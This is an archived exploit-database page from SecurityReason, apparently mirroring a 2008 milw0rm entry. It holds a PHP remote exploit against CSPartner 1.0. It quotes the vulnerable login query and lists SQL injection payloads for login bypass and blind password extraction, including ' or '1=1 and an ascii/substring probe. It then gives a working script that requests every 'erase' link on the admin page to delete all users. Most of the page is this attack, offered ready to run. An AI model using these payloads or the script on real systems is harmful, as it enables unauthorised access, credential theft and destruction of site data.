|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 5001 Milw0rm ID : 6814 Credit : StAkeR Date : 28.10.2008 Exploit Code : <?php /* CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit ---------------------------------------------------------------- By StAkeR[at]hotmail[dot]it http://www.easy-script.com/scripts-dl/cspartne-01.zip ---------------------------------------------------------------- File gestion.php 5. if(!empty($_POST["pseudo"]) && !empty($_POST["passe"])){ 6. $sql = "SELECT * FROM $tblPartner where pseudo='".$_POST["pseudo"]."' AND password='".$_POST["passe"]."'"; 7. $resultat = mysql_db_query($mydbPartner, $sql); Blind SQL Injection or Login ByPass for you :P Examples: ($_POST['pseudo'] and $_POST['passe']) -1 ' or '1=1 -2 ' or ascii(substring((select password from CSPartner where id=1),1,1))=[97]/* -3 and other :D */ error_reporting(0); $host = $argv[1] or die("Usage: php [exploit.php] [http://localhost/cms]\n"); if(preg_match_all('/erase=(.+?)"/',file_get_contents($host.'/admin/index.ph p'),$out)) { for($i=0;$i<=count($out);$i++) { file_get_contents($host.'/admin/index.php?erase='.$out[1][$i]); } echo "[-] All Users Deleted\n"; } else { echo "[-] Exploit Failed!\n"; } |
||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |